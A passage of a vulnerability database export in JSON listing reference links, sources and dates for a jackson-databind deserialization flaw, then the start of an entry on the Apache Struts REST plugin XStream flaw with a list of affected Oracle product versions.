"url": "https://access.redhat.com/security/cve/cve-2019-14832"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-10201"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_build_of_thorntail/2.5/html/release_notes_for_thorntail_2.5/"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2020:2067"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-3875"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14838"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-10219"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14832"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-10199"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?downloadtype=distributions\u0026product=catrhoar.thorntail\u0026version=2.5.1"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-10201"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-1729"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-10199"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-14838"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-10219"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-14820"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14820"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-1727"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-1727"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product=core.service.rhsso\u0026downloadtype=distributions\u0026version=7.4"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhba-2020:1414"
},
{
"trust": 0.1,
"url": "https://issues.jboss.org/):"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-10174"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2020:2333"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/jboss_enterprise_application_platform_continuous_delivery/19/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-10688"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-10688"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product\\xeap-cd\u0026downloadtype=securitypatches\u0026version\u0019"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-10174"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-1732"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14060"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_process_automation_manager/7.8/html/release_notes_for_red_hat_process_automation_manager_7.8/index"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-1718"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-9515"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-13990"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?downloadtype=distributions\u0026product=rhpam\u0026version=7.8.0"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2020:3197"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-1718"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-9518"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-13990"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-9518"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14061"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14062"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-1719"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-1710"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-9488"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product\\xdata.grid\u0026downloadtype=securitypatches\u0026version=7.3"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-9547"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-1745"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-9488"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2020:3779"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-1719"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-10714"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-1757"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-1695"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-10714"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-9548"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_data_grid/7.3/html/red_hat_data_grid_7.3_release_notes/index"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-8840"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-9546"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-7658"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-1710"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-1748"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2017-7658"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-1748"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11797"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-12086"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-1000632"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-1000632"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-3831"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-0231"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-11797"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?downloadtype=distributions\u0026product=jboss.fuse\u0026version=7.7.0"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-12541"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-3797"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2016-4970"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-9827"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_fuse/7.7/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-12086"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-4970"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-1953"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-0231"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-9827"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-3831"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-12541"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2020:3192"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-14195"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-3797"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2020:1523"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/team/key/"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/articles/11258"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-163658"
},
{
"db": "VULMON",
"id": "CVE-2020-11112"
},
{
"db": "PACKETSTORM",
"id": "157741"
},
{
"db": "PACKETSTORM",
"id": "160601"
},
{
"db": "PACKETSTORM",
"id": "157859"
},
{
"db": "PACKETSTORM",
"id": "158651"
},
{
"db": "PACKETSTORM",
"id": "159208"
},
{
"db": "PACKETSTORM",
"id": "158636"
},
{
"db": "PACKETSTORM",
"id": "157322"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-1736"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003616"
},
{
"db": "NVD",
"id": "CVE-2020-11112"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "VULHUB",
"id": "VHN-163658",
"ident": null
},
{
"db": "VULMON",
"id": "CVE-2020-11112",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "157741",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "160601",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "157859",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "158651",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "159208",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "158636",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "157322",
"ident": null
},
{
"db": "CNNVD",
"id": "CNNVD-202003-1736",
"ident": null
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003616",
"ident": null
},
{
"db": "NVD",
"id": "CVE-2020-11112",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2020-03-31T00:00:00",
"db": "VULHUB",
"id": "VHN-163658",
"ident": null
},
{
"date": "2020-03-31T00:00:00",
"db": "VULMON",
"id": "CVE-2020-11112",
"ident": null
},
{
"date": "2020-05-18T16:42:53",
"db": "PACKETSTORM",
"id": "157741",
"ident": null
},
{
"date": "2020-12-17T18:09:37",
"db": "PACKETSTORM",
"id": "160601",
"ident": null
},
{
"date": "2020-05-28T16:22:46",
"db": "PACKETSTORM",
"id": "157859",
"ident": null
},
{
"date": "2020-07-29T17:53:05",
"db": "PACKETSTORM",
"id": "158651",
"ident": null
},
{
"date": "2020-09-17T14:07:40",
"db": "PACKETSTORM",
"id": "159208",
"ident": null
},
{
"date": "2020-07-29T00:05:59",
"db": "PACKETSTORM",
"id": "158636",
"ident": null
},
{
"date": "2020-04-21T14:19:58",
"db": "PACKETSTORM",
"id": "157322",
"ident": null
},
{
"date": "2020-03-31T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202003-1736",
"ident": null
},
{
"date": "2020-04-21T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2020-003616",
"ident": null
},
{
"date": "2020-03-31T05:15:13.070000",
"db": "NVD",
"id": "CVE-2020-11112",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2021-12-10T00:00:00",
"db": "VULHUB",
"id": "VHN-163658",
"ident": null
},
{
"date": "2021-12-10T00:00:00",
"db": "VULMON",
"id": "CVE-2020-11112",
"ident": null
},
{
"date": "2022-06-10T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202003-1736",
"ident": null
},
{
"date": "2020-04-21T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2020-003616",
"ident": null
},
{
"date": "2024-11-21T04:56:49.010000",
"db": "NVD",
"id": "CVE-2020-11112",
"ident": null
}
]
},
"threat_type": {
"_id": null,
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202003-1736"
}
],
"trust": 0.6
},
"title": {
"_id": null,
"data": "FasterXML jackson-databind Unreliable data deserialization vulnerability in",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-003616"
}
],
"trust": 0.8
},
"type": {
"_id": null,
"data": "code problem",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202003-1736"
}
],
"trust": 0.6
}
}
VAR-201709-1229
Vulnerability from variot - Updated: 2025-12-20 23:27The REST Plugin in Apache Struts 2.1.1 through 2.3.x before 2.3.34 and 2.5.x before 2.5.13 uses an XStreamHandler with an instance of XStream for deserialization without any type filtering, which can lead to Remote Code Execution when deserializing XML payloads. Apache Struts 2 framework, versions 2.5 to 2.5.12, with REST plugin insecurely deserializes untrusted XML data. A remote, unauthenticated attacker can leverage this vulnerability to execute arbitrary code in the context of the Struts application. Apache Struts2 Contains a vulnerability that allows arbitrary code execution (S2-052) Exists. An attacker can exploit this issue to cause a denial-of-service condition, denying service to legitimate users. Apache Struts is prone to a remote code-execution vulnerability. Failed exploit attempts will likely result in denial-of-service conditions. Apache Struts 2.1.2 through 2.3.33 and 2.5 through 2.5.12 are vulnerable
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201709-1229",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "weblogic server",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "10.3.60"
},
{
"model": "weblogic server",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "12.2.1.3"
},
{
"model": "weblogic server",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "12.2.1.2"
},
{
"model": "weblogic server",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "12.2.1.1"
},
{
"model": "weblogic server",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "12.2.1.0"
},
{
"model": "weblogic server",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "12.1.3.0"
},
{
"model": "siebel applications",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "7.1"
},
{
"model": "siebel applications",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "6.2"
},
{
"model": "mysql enterprise monitor",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "3.2.1182"
},
{
"model": "mysql enterprise monitor",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "3.4.2.4181"
},
{
"model": "mysql enterprise monitor",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "3.4.1"
},
{
"model": "mysql enterprise monitor",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "3.4.0"
},
{
"model": "mysql enterprise monitor",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "3.3.4.3247"
},
{
"model": "mysql enterprise monitor",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "3.3.3.1199"
},
{
"model": "mysql enterprise monitor",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "3.3.2.1162"
},
{
"model": "mysql enterprise monitor",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "3.3.0.1098"
},
{
"model": "mysql enterprise monitor",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "3.2.8.2223"
},
{
"model": "mysql enterprise monitor",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "3.2.7.1204"
},
{
"model": "mysql enterprise monitor",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "3.2.5.1141"
},
{
"model": "mysql enterprise monitor",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "3.2.4.1102"
},
{
"model": "mysql enterprise monitor",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "3.2.1.1049"
},
{
"model": "micros retail xbri loss prevention",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "10.8.1"
},
{
"model": "micros retail xbri loss prevention",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "10.8"
},
{
"model": "micros retail xbri loss prevention",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "10.7"
},
{
"model": "micros retail xbri loss prevention",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "10.6"
},
{
"model": "micros retail xbri loss prevention",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "10.5"
},
{
"model": "micros retail xbri loss prevention",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "10.0.1"
},
{
"model": "insurance performance insight for general insurance",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "8.0"
},
{
"model": "insurance data foundation",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "8.0.5"
},
{
"model": "insurance data foundation",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "8.0.4"
},
{
"model": "insurance data foundation",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "8.0.3"
},
{
"model": "insurance data foundation",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "8.0.2"
},
{
"model": "insurance data foundation",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "8.0.1"
},
{
"model": "flexcube private banking",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "12.1"
},
{
"model": "flexcube private banking",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "12.0.3"
},
{
"model": "flexcube private banking",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "12.0.2"
},
{
"model": "flexcube private banking",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "12.0.1"
},
{
"model": "flexcube private banking",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "12.0"
},
{
"model": "flexcube private banking",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "2.2"
},
{
"model": "flexcube private banking",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "3.0"
},
{
"model": "financial services retail performance analytics",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "8.0.5"
},
{
"model": "financial services retail performance analytics",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "8.0.4"
},
{
"model": "financial services retail performance analytics",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "8.0.3"
},
{
"model": "financial services retail performance analytics",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "8.0.2"
},
{
"model": "financial services retail performance analytics",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "8.0.1"
},
{
"model": "financial services retail performance analytics",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "8.0"
},
{
"model": "financial services retail customer analytics",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "8.0.5"
},
{
"model": "financial services retail customer analytics",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "8.0.4"
},
{
"model": "financial services retail customer analytics",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "8.0.3"
},
{
"model": "financial services retail customer analytics",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "8.0.2"
},
{
"model": "financial services retail customer analytics",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "8.0.1"
},
{
"model": "financial services retail customer analytics",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "8.0"
},
{
"model": "financial services profitability management",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "8.0.5"
},
{
"model": "financial services profitability management",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "8.0.4"
},
{
"model": "financial services profitability management",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "8.0.3"
},
{
"model": "financial services profitability management",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "8.0.2"
},
{
"model": "financial services profitability management",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "8.0.1"
},
{
"model": "financial services profitability management",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "6.1.1"
},
{
"model": "financial services profitability management",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "6.1"
},
{
"model": "financial services profitability management",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "6.0"
},
{
"model": "financial services pricing management",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "8.0.5"
},
{
"model": "financial services pricing management",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "8.0.4"
},
{
"model": "financial services pricing management",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "8.0"
},
{
"model": "financial services price creation and discovery",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "8.0.5"
},
{
"model": "financial services price creation and discovery",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "8.0.4"
},
{
"model": "financial services price creation and discovery",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "8.0"
},
{
"model": "financial services loan loss forecasting and provisioning",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "8.0.5"
},
{
"model": "financial services loan loss forecasting and provisioning",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "8.0.4"
},
{
"model": "financial services loan loss forecasting and provisioning",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "8.0.3"
},
{
"model": "financial services loan loss forecasting and provisioning",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "8.0.2"
},
{
"model": "financial services loan loss forecasting and provisioning",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "8.0.1"
},
{
"model": "financial services loan loss forecasting and provisioning",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "1.5.1"
},
{
"model": "financial services loan loss forecasting and provisioning",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "1.5"
},
{
"model": "financial services liquidity risk management",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "8.0.4"
},
{
"model": "financial services liquidity risk management",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "8.0.2"
},
{
"model": "financial services liquidity risk management",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "8.0.1"
},
{
"model": "financial services institutional performance analytics",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "8.0.5"
},
{
"model": "financial services institutional performance analytics",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "8.0.4"
},
{
"model": "financial services institutional performance analytics",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "8.0.3"
},
{
"model": "financial services institutional performance analytics",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "8.0.2"
},
{
"model": "financial services institutional performance analytics",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "8.0.1"
},
{
"model": "financial services institutional performance analytics",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "8.0"
},
{
"model": "financial services icaap analytics",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "8.0"
},
{
"model": "financial services hedge management and ifrs valuations",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "8.0.5"
},
{
"model": "financial services hedge management and ifrs valuations",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "8.0.4"
},
{
"model": "financial services hedge management and ifrs valuations",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "8.0.3"
},
{
"model": "financial services hedge management and ifrs valuations",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "8.0.2"
},
{
"model": "financial services hedge management and ifrs valuations",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "8.0.1"
},
{
"model": "financial services hedge management and ifrs valuations",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "6.1.1"
},
{
"model": "financial services funds transfer pricing",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "8.0.5"
},
{
"model": "financial services funds transfer pricing",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "8.0.4"
},
{
"model": "financial services funds transfer pricing",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "8.0.3"
},
{
"model": "financial services funds transfer pricing",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "8.0.2"
},
{
"model": "financial services funds transfer pricing",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "8.0.1"
},
{
"model": "financial services funds transfer pricing",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "6.1.1"
},
{
"model": "financial services funds transfer pricing",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "6.1"
},
{
"model": "financial services funds transfer pricing",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "6.0"
},
{
"model": "financial services enterprise financial performance analytics",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "8.0.5"
},
{
"model": "financial services enterprise financial performance analytics",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "8.0.4"
},
{
"model": "financial services enterprise financial performance analytics",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "8.0.3"
},
{
"model": "financial services enterprise financial performance analytics",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "8.0.2"
},
{
"model": "financial services enterprise financial performance analytics",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "8.0.1"
},
{
"model": "financial services enterprise financial performance analytics",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "8.0"
},
{
"model": "financial services data integration hub",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "8.0.4"
},
{
"model": "financial services data integration hub",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "8.0.3"
},
{
"model": "financial services data integration hub",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "8.0.2"
},
{
"model": "financial services data integration hub",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "8.0.1"
},
{
"model": "financial services data foundation",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "8.0.5"
},
{
"model": "financial services data foundation",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "8.0.4"
},
{
"model": "financial services data foundation",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "8.0.3"
},
{
"model": "financial services data foundation",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "8.0.2"
},
{
"model": "financial services data foundation",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "8.0.1"
},
{
"model": "financial services data foundation",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "7.4"
},
{
"model": "financial services data foundation",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "7.3"
},
{
"model": "financial services basel regulatory capital internal ratings bas",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "8.0.4"
},
{
"model": "financial services basel regulatory capital internal ratings bas",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "8.0.3"
},
{
"model": "financial services basel regulatory capital internal ratings bas",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "8.0.2"
},
{
"model": "financial services basel regulatory capital internal ratings bas",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "8.0.1"
},
{
"model": "financial services basel regulatory capital basic",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "8.0.4"
},
{
"model": "financial services basel regulatory capital basic",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
